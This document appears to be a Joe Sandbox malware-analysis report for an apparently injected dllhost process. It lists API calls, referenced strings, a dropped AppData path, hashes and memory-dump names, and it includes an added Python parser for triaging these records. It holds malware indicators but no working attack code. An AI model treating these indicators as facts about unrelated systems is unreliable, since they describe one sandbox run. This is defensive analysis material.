                                                                              • Opcode ID: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                                                              • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
                                                                              • Opcode Fuzzy Hash: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                                                              • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
                                                                              APIs
                                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000800), ref: 00406160
                                                                              • RegCloseKey.KERNEL32(?), ref: 0040616B
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              • String ID: : Completed
                                                                              • API String ID: 3356406503-2954849223
                                                                              • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                              • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
                                                                              • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                              • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
                                                                              APIs
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                              • CloseHandle.KERNEL32(?), ref: 00405867
                                                                              Strings
                                                                              • Error launching installer, xrefs: 00405844
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
                                                                              • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                                                              • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                              • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
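The per-function records on this page (API calls with their call-site addresses, the strings each function references, the memory-dump file the code was lifted from, and the similarity IDs) are machine-generated and highly repetitive, which makes them awkward to hunt through by eye but easy to parse. The following Python is an added example, not Joe Sandbox code: it parses a constructed excerpt copied in the page's own layout (the CreateProcessW function above plus one record without API calls), decodes the dump-file name under the assumption that its fields are process, stage, dump id, base address, Win32 page protection, a flag, Win32 memory type and an index (all hex except the decimal dump id), cross-checks that decoding against the `hcaresult_23_2_400000_dllhost` snapshot name, and lists every function that creates a process together with the strings it references.

```python
"""Parse Joe Sandbox per-function records into structured data.
Added example, not Joe Sandbox code; dump-name field meanings are an assumption."""
import re

# Constructed excerpt copied in the page's layout (two records).
SAMPLE_REPORT = """\
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
• CloseHandle.KERNEL32(?), ref: 00405867
Strings
• Error launching installer, xrefs: 00405844
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
• Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
• Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
• Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
Memory Dump Source
• Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID:
• Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
• Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^(.*), xrefs: ([0-9A-Fa-f, ]+)$")
FIELD_RE = re.compile(r"^([A-Za-z ]+): ?(.*)$")
# Win32 constants; assumption: the dump name carries them in hex.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
PROCESS_APIS = {"CreateProcessW", "CreateProcessA", "ShellExecuteExW", "WinExec"}


def decode_dump_name(name):
    """Assumed layout: <proc>.<stage>.<dumpid>.<base>.<protect>.<flag>.<type>.<idx>.sdmp."""
    parts = name.removesuffix(".sdmp").split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected dump name: {name}")
    proc, stage, dump_id, base, protect, _flag, mtype, idx = parts
    return {"process": int(proc, 16), "stage": int(stage, 16), "dump_id": int(dump_id),
            "base": int(base, 16), "protect": PAGE_PROTECT.get(int(protect, 16), protect),
            "type": MEM_TYPE.get(int(mtype, 16), mtype), "index": int(idx, 16)}


def _new_record():
    return {"apis": [], "strings": [], "dumps": [], "meta": {}}


def parse_records(text):
    """One record per function; a record ends at its 'Instruction Fuzzy Hash' line."""
    records, cur, section = [], _new_record(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            if m := API_RE.match(line):
                func, module, args, ref = m.groups()
                # Naive split: a string argument containing a comma would be split too.
                cur["apis"].append({"func": func, "module": module,
                                    "args": args.split(","), "ref": int(ref, 16)})
        elif section == "Strings":
            if m := STRING_RE.match(line):
                cur["strings"].append({"value": m.group(1),
                                       "xrefs": [int(x, 16) for x in m.group(2).split(",")]})
        elif section == "Memory Dump Source":
            if m := FIELD_RE.match(line):
                kind, rest = m.groups()
                # Drop the 'Download File' link text the HTML export glues onto names.
                name = rest.split(",")[0].removesuffix("Download File").strip()
                cur["dumps"].append({"kind": kind, "name": name, **decode_dump_name(name)})
                if off := re.search(r"Offset: ([0-9A-Fa-f]+)", rest):
                    cur["meta"]["Offset"] = int(off.group(1), 16)   # image base
        elif m := FIELD_RE.match(line):
            key, val = m.groups()
            cur["meta"][key] = val
            if key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur, section = _new_record(), None
    return records


def snapshot_consistent(rec):
    """hcaresult_<proc>_<stage>_<imagebase>_<image>.jbxd must agree with the decoded
    Source File fields and the record's Offset (the assumed decoding, checked)."""
    m = re.match(r"hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_", rec["meta"].get("Snapshot File", ""))
    src = next((d for d in rec["dumps"] if d["kind"] == "Source File"), None)
    if not m or src is None:
        return False
    return (int(m.group(1)), int(m.group(2)), int(m.group(3), 16)) == \
        (src["process"], src["stage"], rec["meta"].get("Offset"))


def process_launchers(records):
    """(call site, API, strings referenced by the same function) for every record
    whose API list creates a process; a handy pivot when triaging hollowed hosts."""
    return [(api["ref"], api["func"], [s["value"] for s in rec["strings"]])
            for rec in records for api in rec["apis"] if api["func"] in PROCESS_APIS]


if __name__ == "__main__":
    for ref, func, strings in process_launchers(parse_records(SAMPLE_REPORT)):
        print(f"{ref:08X} {func} {strings}")
```

Run against the full report text, the same parser gives one dict per function, so the fuzzy-hash and API-ID fields can be compared across samples instead of read line by line; the `Associated` dumps are parsed as well, so the protection decoding also shows which regions of the injected image were writable.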
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                                                              • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                              • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                                                              • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                              • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                                                              • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                              • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                                                              • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                              • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                                                              • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                              • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                              • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                                                              • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                              • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                               • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                              • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                                                              • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                              • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                                                              APIs
                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                                              • RegCloseKey.KERNEL32(?), ref: 00402551
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Enum$CloseValue
                                                                              • String ID:
                                                                              • API String ID: 397863658-0
                                                                              • Opcode ID: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                                                              • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                                                              • Opcode Fuzzy Hash: 5fe39f6a887c8af29e07c615d6c30983e444cdbe436708b2e3fcea9e6197479e
                                                                              • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?), ref: 0040217D
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea, xrefs: 004021BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmp
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
